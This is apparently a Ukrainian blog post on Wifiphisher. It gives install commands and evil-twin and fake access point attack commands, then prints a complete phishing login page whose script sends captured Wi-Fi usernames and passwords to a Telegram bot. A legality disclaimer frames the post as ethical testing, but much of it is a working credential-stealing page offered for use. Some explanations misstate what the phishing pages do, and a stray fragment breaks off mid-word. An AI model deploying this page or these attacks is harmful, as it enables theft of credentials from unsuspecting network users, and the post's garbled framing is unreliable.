взлом wi-fi

Створення фейкової Wi-Fi мережі для перехоплення паролів

Пам’ятайте: закон понад усе, і дотримання правил є обов’язковим. Це означає, що все, описане нижче, виключно для тестування і має виконуватися тільки з дозволу власника мережі. Отже, вперед!

Щодня з’являються нові методи злому Wi-Fi мереж, що змушує власників бути уважнішими до своєї безпеки. Одним із засобів, який може допомогти перевірити вразливості вашої Wi-Fi мережі, є Wifiphisher.

Wifiphisher – що це?

Wifiphisher – це потужна бібліотека з відкритим кодом, створена для тестування безпеки Wi-Fi мереж через атаки соціальної інженерії. Давайте розглянемо, як працює цей інструмент, які сценарії він підтримує і як його можна використовувати.

Основні можливості Wifiphisher

  • Створення фейкових точок доступу (Fake AP):
    Wifiphisher може створювати фейкові Wi-Fi мережі, що імітують справжні. Це дозволяє перевірити, наскільки користувачі схильні підключатися до незахищених мереж.
  • Атака Evil-Twin:
    Інструмент відключає користувачів від їхньої реальної Wi-Fi мережі і перенаправляє їх до фейкової точки доступу, де зловмисник може збирати дані.
  • Фішингові сторінки:
    Wifiphisher дозволяє налаштовувати фейкові сторінки входу, щоб переконатися, що користувачі не вводять свої паролі на незахищених ресурсах.
  • Гнучкість у налаштуванні:
    Бібліотека підтримує різні моделі атак і сценарії, які можна адаптувати під конкретні потреби.

Як встановити Wifiphisher?

Встановлення Wifiphisher відносно просте, але важливо зазначити, що інструмент працює тільки на Linux. Ось основні кроки:

  • Переконайтеся, що Python 3 та менеджер пакетів pip встановлені на вашому пристрої.
  • Клонуйте репозиторій Wifiphisher з GitHub:
    git clone https://github.com/wifiphisher/wifiphisher.git
  • Перейдіть до папки проєкту і встановіть залежності:
    cd wifiphisher
    sudo python3 setup.py install
  • Запустіть інструмент:
    sudo wifiphisher

Приклади використання Wifiphisher

Сценарій 1: Перевірка безпеки мережі проти атак Evil-Twin

  • Запустіть Wifiphisher з опцією для атаки Evil-Twin:
    sudo wifiphisher --essid "MyHomeWiFi" --channel 6
  • Користувачів, підключених до реальної мережі, буде відключено і перенаправлено до вашої фейкової точки доступу.
  • Налаштуйте фішингову сторінку, щоб переконатися, що користувачі не вводять свої дані на незахищених ресурсах. Наприклад, щоб створити кастомну сторінку входу, використовуйте:
    sudo wifiphisher --phishing-page-name "credentials"

Сценарій 2: Створення відкритої фейкової точки доступу

  • Запустіть Wifiphisher у режимі Fake-AP:
    sudo wifiphisher --essid "FreeWiFi" --channel 11
  • Спостерігайте в реальному часі, скільки користувачів підключається до вашої фейкової точки доступу, відстежуючи журнали:
    tail -f /var/log/wifiphisher.log
  • Потрібен детальніший аналіз зібраних даних? Використовуйте вбудовані плагіни:
    sudo wifiphisher --plugin "plugin_name"

Сценарій 3: Перехоплення даних через фішингову сторінку

Окрім вбудованих шаблонів Wifiphisher, ви можете створити власну кастомну сторінку для перехоплення паролів. Ось приклад простого HTML-коду сторінки входу, яка збирає логіни і надсилає їх у Telegram (інструкцію можна знайти тут) :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wi-Fi Login</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
margin-top: 50px;
}
.login-box {
width: 300px;
padding: 40px;
border-radius: 10px;
box-shadow: 0 0 15px rgba(0,0,0,0.2);
background-color: #f1f1f1;
margin: auto;
}
input[type="text"], input[type="password"] {
width: 100%;
padding: 10px;
margin: 10px 0;
border: 1px solid #ddd;
border-radius: 5px;
}
button {
width: 100%;
padding: 10px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<div class="login-box">
<h2>Wi-Fi Login</h2>
<form id="loginForm">
<input type="text" id="username" placeholder="Wi-Fi Username" required>
<input type="password" id="password" placeholder="Wi-Fi Password" required>
<button type="button" onclick="submitForm()">Submit</button>
</form>
</div>
<script>
function submitForm() {
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
// Create a message to send to Telegram
var message = "Captured data:\nUsername: " + username + "\nPassword: " + password;
// Send data to Telegram via API
var botToken = 'YOUR_BOT_TOKEN';  // Replace with your token
var chatId = 'YOUR_CHAT_ID';      // Replace with your chat_id
var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
// Send data using XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.send();
// Notify that data has been sent
alert('Your data has been sent!');
}
</script>
</body>
</html>

Висновок

Важливо розуміти, що Wifiphisher призначений виключно для етичного хакінгу 🙂 Використання його для перевірки сторонніх мереж без дозволу власника є незаконним. Цей інструмент створений для допомоги експертам із кібербезпеки у виявленні вразливостей і запобіганні потенційним атакам.

Дякую за увагу. Як завжди, якщо у вас є запитання, пишіть мені на електронну пошту або в Telegram.

Якщо потрібно щось виправ

Support the Blog!

Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️

PayPal Logo Donate via PayPal

Revolut Logo Donate via Revolut

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *